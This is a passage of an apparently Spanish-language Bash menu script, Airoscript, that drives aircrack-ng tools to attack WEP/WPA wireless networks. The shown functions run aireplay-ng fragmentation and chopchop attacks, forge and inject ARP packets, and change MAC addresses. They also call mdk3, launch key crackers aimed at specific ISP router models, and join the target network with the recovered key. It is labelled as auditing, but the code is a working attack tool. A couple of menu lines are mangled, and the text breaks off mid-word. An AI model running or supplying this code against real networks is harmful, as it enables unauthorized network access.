xterm -hold $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -title "Ataque de Fragmentacion en: $Host_SSID" -e aireplay-ng -5 -b $Host_MAC -h $FAKE_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $WIFI & capture & fakeauth3 &
sleep 2
clear
injectmenu
}
function fragnoclientend {
packetforge-ng -0 -a $Host_MAC -h $FAKE_MAC -k $Client_IP -l $Host_IP -y fragment-*.xor -w $DUMP_PATH/frag_$Host_MAC.cap
xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -title "Inyectando packet forjado en $Host_SSID" -e aireplay-ng -2 -r $DUMP_PATH/frag_$Host_MAC.cap -h $FAKE_MAC -x $INJECTRATE $WIFI &
sleep 2
clear
}
function fragmentationattack {
rm -rf fragment-*.xor
rm -rf $DUMP_PATH/frag_*.cap
rm -rf $DUMP_PATH/$Host_MAC*
killall -9 airodump-ng aireplay-ng
xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -title "Ataque de Fragmentacion en: $Host_SSID" -e aireplay-ng -5 -b $Host_MAC -h $Client_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $WIFI & capture &
sleep 2
clear
injectmenu
}
function fragmentationattackclient {
rm -rf fragment-*.xor
rm -rf $DUMP_PATH/frag_*.cap
rm -rf $DUMP_PATH/$Host_MAC*
killall -9 airodump-ng aireplay-ng
xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -title "Ataque de Fragmentacion en: $Host_SSID" -e aireplay-ng -7 -b $Host_MAC -h $Client_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $WIFI & capture &
sleep 2
clear
injectmenu
}
function fragmentationattackend {
packetforge-ng -0 -a $Host_MAC -h $Client_MAC -k $Client_IP -l $Host_IP -y fragment-*.xor -w $DUMP_PATH/frag_$Host_MAC.cap
xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#1DFF00" -title "Inyectando packet forjado en $Host_SSID" -e aireplay-ng -2 -r $DUMP_PATH/frag_$Host_MAC.cap -h $Client_MAC -x $INJECTRATE $WIFI &
sleep 2
clear
}
function pskarp {
rm -rf $ARP_PATH/arp_$Host_MAC.cap # antes borraba todo el directorio, ahora solo borra el archivo que podria molestarle
packetforge-ng -0 -a $Host_MAC -h $Client_MAC -k $Client_IP -l $Host_IP -y $DUMP_PATH/dump*.xor -w $ARP_PATH/arp_$Host_MAC.cap
capture & xterm $HOLD $BOTTOMLEFT -bg "#000000" -fg "#99CCFF" -title "Enviando ARP forjado a $Host_SSID" -e aireplay-ng --interactive -r $ARP_PATH/arp_$Host_MAC.cap -h $Client_MAC -x $INJECTRATE $WIFI &
sleep 2
clear
}
function injectmenu {
clear
while true; do
sleep 2
clear
echo " "
echo " Si el paso anterior dió resultado,"
echo " selecciona. Si no, pulsa 5 "
echo " "
echo " 1) Frag inyeccion "
echo " 2) Frag con cliente inyeccion "
echo " 3) Chochop inyeccion "
echo " 4) Chopchop Con client inyec. "
echo " 5) Volver al menu Principal "
echo " "
echo -n " #> "
read yn
echo ""
case $yn in
1 ) fragnoclientend ; break ;;
2 ) fragmentationattackend ; break ;;
3 ) chopchopend ; break ;;
4 ) chopchopclientend ; break ;;
5 ) break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function optionmenu {
KEY2=`cat "$KEYS"/"$Host_SSID.txt"`
WIFI3=$WIFI2
while true; do
clear
echo " "
echo " Selecciona una opcion "
echo " "
echo " 1) Selecciona otro interface "
echo " 2) Reset interface actual "
echo " 3) Filtro pantalla por ESSID "
echo " 4) Cambiar MAC "
echo " 5) Cambiar RATE "
echo " 6) Cambiar PPS "
echo " 7) Cambiar tiempo desauten... "
echo "
Test inyeccion "
echo " 9) Chequear con airmon-ng "
echo " 10) Mdk3 "
echo " 11) Eliminar archivos "
echo " 12) Eliminar diccionarios "
echo " 13) Explorar directorio de Salida "
echo " 14) Abrir un terminal "
echo " 15) Reiniciar Airoscript "
echo " 16) Abrir otro Airoscript "
echo " 17) Conectar con objetivo "
echo " 18) Volver al menu Principal "
echo " "
echo -n " #> "
read yn
echo ""
case $yn in
1 ) setinterface ; break ;;
2 ) cleanup ; break ;;
3 ) SetAdvancedESSIDFilter ; break ;;
4 ) wichchangemac ; break ;;
5 ) changerrate ; break ;;
6 ) ppsinput ; break ;;
7 ) desauinput ; break ;;
8 ) inject_test ; break ;;
9 ) airmoncheck ; break ;;
10 ) choosemdk ; break ;;
11 ) cleanupdel ; break ;;
12 ) cleanupdel1 ; break ;;
13 ) directorio ; break ;;
14 ) openxterm ; break ;;
15 ) openscript ; break ;;
16 ) openscript1 ; break ;;
17 ) conectmenu ; break ;;
18 ) break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function exitmenu {
clear
airmon-ng stop $WIFI
exit
}
function crackmenu {
while true; do
clear
echo " "
echo " Menu Auditar "
echo " "
echo " 1) Aircrack (WEP/WPA) "
echo " 2) Wlandecripter (WEP) "
echo " 3) Dlinkdecripter (WEP) "
echo " 4) Stkeys (WEP) "
echo " 5) Jazzteldecrypter (WEP) "
echo " 6) Wlan4xx (WEP/WPA) "
echo " 7) Ono4xx (WEP/WPA) "
echo "
WPAmagickey (WPA) "
echo " 9) Volver al menu Principal "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) witchcrack ; break ;;
2 ) wlgen_wlandecrypter ; break ;;
3 ) wlgen_dlinkdecrypter ; break ;;
4 ) wlgen_stkeys ; break ;;
5 ) wlgen_jazzteldecrypter ; break ;;
6 ) wlgen_wlan4xx ; break ;;
7 ) wlgen_ono4xx ; break ;;
8 ) wlgen_wpamagickey ; break ;;
9 ) break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function ppsinput {
echo -n "Teclee la nueva cantidad de PPS (Paquetes Por Segundo, ej: 300): "
read ppsmanual
echo
echo PPS Cambiado a: $ppsmanual PPS
INJECTRATE=$ppsmanual
sleep 2
clear
optionmenu
}
function desauinput {
echo -n "Teclee el nuevo tiempo de desautenticación (En Segundos, 0 = Sin Limite): "
read desaumanual
echo Tiempo de desautenticación cambiado a: $desaumanual Segundos
DEAUTHTIME=$desaumanual
sleep 2
clear
optionmenu
}
function conectmenu {
while true; do
clear
echo " "
echo " Conectar a red seleccionada "
echo " "
echo " 1) Seleccionar interface "
echo " 2) Ingresar Key "
echo " 3) Conectar "
echo " 4) Desconectar "
echo " 5) Volver al menu Principal "
echo " "
echo -n " #> "
read yn
case $yn in
1 ) interselect ; break ;;
2 ) keyin ; break ;;
3 ) conect ; break ;;
4 ) desconect ; break ;;
5 ) break ;;
* ) echo "Opción desconocida. Elige de nuevo" ;;
esac
done
clear
}
function interselect {
#INTERFACES=`iwconfig|grep --regexp=^[^:blank:].[:alnum:]|awk '{print $1}'`
#INTERFACES=`iwconfig|egrep "^[a-Z]+[0-9]+" |awk '{print $1}'`
INTERFACES=`ip link |egrep "^[0-9]+" | cut -d':' -f 2 | cut -d' ' -f 2 | grep -v "lo" |awk '{print $1}'`
if [ "$WIFI3" = "" ]
clear
then
echo "Selecciona una interface en modo managed para la conexion: "
echo ""
select WIFI3 in $INTERFACES; do
break;
done
echo "Se usara $WIFI3 para conectar a $Host_SSID"
else
clear
fi
sleep 2
conectmenu
}
function keyin {
echo -n "Teclee la KEY para $Host_SSID (KEY_en_HEX o s:KEY_en_ASCII): "
read KEY3
KEY2=$KEY3
echo""
echo Se conectará utilizando esta contraseña: $KEY2
sleep 2
clear
conectmenu
}
function conect {
ifconfig $WIFI3 up
iwconfig $WIFI3 essid "$Host_SSID"
iwconfig $WIFI3 key $KEY2
iwconfig $WIFI3 mode Managed
dhcpcd -nd $WIFI3
conectmenu
}
function desconect {
ifconfig $WIFI3 down
ifconfig $WIFI3 up
conectmenu
}
function changerrate {
while true; do
clear
echo " "
echo " Cambiar RATE a... "
echo " "
echo " 1) 1M "
echo " 2) 2M "
echo " 3) 5M "
echo " 4) Auto "
echo " "
ec
